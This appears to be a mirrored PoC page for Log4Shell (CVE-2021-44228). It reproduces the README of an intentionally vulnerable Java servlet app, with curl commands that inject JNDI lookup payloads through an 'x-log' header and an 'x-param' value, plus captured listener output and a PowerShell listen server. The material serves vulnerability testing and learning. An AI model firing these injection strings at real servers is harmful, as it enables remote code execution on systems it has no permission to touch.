Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source
https://github.com/KtokKawu/l4s-vulnapp
Associated Vulnerability
Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
This is a potentially vulnerable Java web application containing Log4j affected by log4shell(CVE-2021-44228).
Readme
# Log4Shell Vulnerable Application(l4s-vulnapp)

This is a potentially vulnerable Java web application containing Log4j(2.14.1) affected by [log4shell](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228)(CVE-2021-44228).

## Verified environment and various versions

- [AdoptOpenJDK 17.0.10+7](https://adoptium.net/temurin/releases/?os=windows&arch=x64&package=jdk&version=17)
- [Gradle 8.6](https://gradle.org/next-steps/?version=8.6&format=all)
- [Gretty 4.1.2](https://plugins.gradle.org/plugin/org.gretty)
- [Apache Tomcat 10.1.15](https://tomcat.apache.org/tomcat-10.1-doc/changelog.html#Tomcat_10.1.15_(schultz))
- [Apache Log4j Core 2.14.1](https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/2.14.1)

## Preparation

- Download and extract [AdoptOpenJDK](https://adoptium.net/temurin/releases/) zip file.
- set a PATH and JAVA_HOME variable.
- Execute `java --version` command to check if AdoptOpenJDK works properly.

[Note]  
If you want to change the JDK version, tomcat port, etc., edit build.gradle.

## Build and Run

Execute Gradle wrapper with build.gradle.

```
# on Linux
./gradlew appRun

# on Windows
.\gradlew.bat appRun
```

Top URL:

```
http://localhost:8080/l4s-vulnapp/
```

[Note]  
Log4Shell triggers only when the app performs some Log4j logging.   
For example, if the following URL is accessed, Log4Shell will be executed.

```
http://localhost:8080/l4s-vulnapp/servlet
```

You can check Log4Shell by tampering with "x-param" value or by adding "x-log" header to the HTTP request when accessing it.  
These params will be logged by Log4j.  
However, this is only if a listening server is standing at localhost:8081.

```
curl http://localhost:8080/l4s-vulnapp/servlet -H 'x-log: ${jndi:rmi://localhost:8081/test.txt}'
curl -X GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D
```

## Verification Results

- HTTP Request
  
  ```
  GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D HTTP/1.1
  Host: localhost:8080
  Connection: keep-alive
  Cache-Control: max-age=0
  sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)   Chrome/122.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/  *;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Referer: http://localhost:8080/l4s-vulnapp/
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: ja,en-US;q=0.9,en;q=0.8
  
  
  ```

- HTTP Response

  ```
  HTTP/1.1 200
  Content-Type: text/plain;charset=utf-8
  Content-Length: 62
  Date: Fri, 15 Mar 2024 18:42:56 GMT
  Keep-Alive: timeout=60
  Connection: keep-alive

  Hello
  Logging to console using vulnerable Log4j2 by parameter
  ```

- RMI Request by l4s-vulnapp

  ```
  2024/03/16 03:42:46: [Start] Receive Server for Log4Shell.
  2024/03/16 03:42:46: [Note] Listening on IP: "localhost" Port: 8081
  2024/03/16 03:42:55: [Note] Requested from IP: "127.0.0.1" Port: 53282)
  2024/03/16 03:42:55: [Hex data] ===== start =====
  2024/03/16 03:42:56: 00000000   4A 52 4D 49 00 02 4B 00 00 00 00 00 00 00 00 00  JRMI..K.........
  2024/03/16 03:42:56: 00000010   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2024/03/16 03:42:56: [Hex data] =====  end  =====
  2024/03/16 03:42:56: [Raw data] ===== start =====
  2024/03/16 03:42:56: JRMI
  2024/03/16 03:42:56: [Raw data] =====  end  =====
  ```

## Option

l4s-ls.ps1  starts a listen server, execute this script on Windows PowerShell/Command Prompt.  
This server receives binary communications such as LDAP and RMI, and can display the contents of said communications in Hex and Raw.  
If the script malfunctions, use Ctrl + C to stop.

[Caution]  
When running this script for the first time, it is necessary to select "Private Network" in the Windows pop-up.

```
PowerShell -ExecutionPolicy RemoteSigned .\l4s-ls.ps1 -p 8081
```

## References

- [GitHub - tothi/log4shell-vulnerable-app](https://github.com/tothi/log4shell-vulnerable-app)
- [ももいろテクノロジー - PowerShellでnc(netcat)を書いてみる (2015/4/16)](https://inaz2.hatenablog.com/entry/2015/04/16/025953)
File Snapshot

 [4.0K]  /data/pocs/54b2eb715f726853c04a43dc640b22ffcfa08f88
├── [ 602]  build.gradle
├── [4.0K]  gradle
│   └── [4.0K]  wrapper
│       ├── [ 42K]  gradle-wrapper.jar
│       └── [ 250]  gradle-wrapper.properties
├── [8.5K]  gradlew
├── [2.8K]  gradlew.bat
├── [3.6K]  l4s-ls.ps1
├── [4.4K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  l4svuln
        │       └── [1.5K]  VulnServlet.java
        ├── [4.0K]  resources
        │   └── [ 407]  log4j2.properties
        └── [4.0K]  webapp
            ├── [ 326]  index.html
            └── [4.0K]  WEB-INF
                └── [ 489]  web.xml

9 directories, 11 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →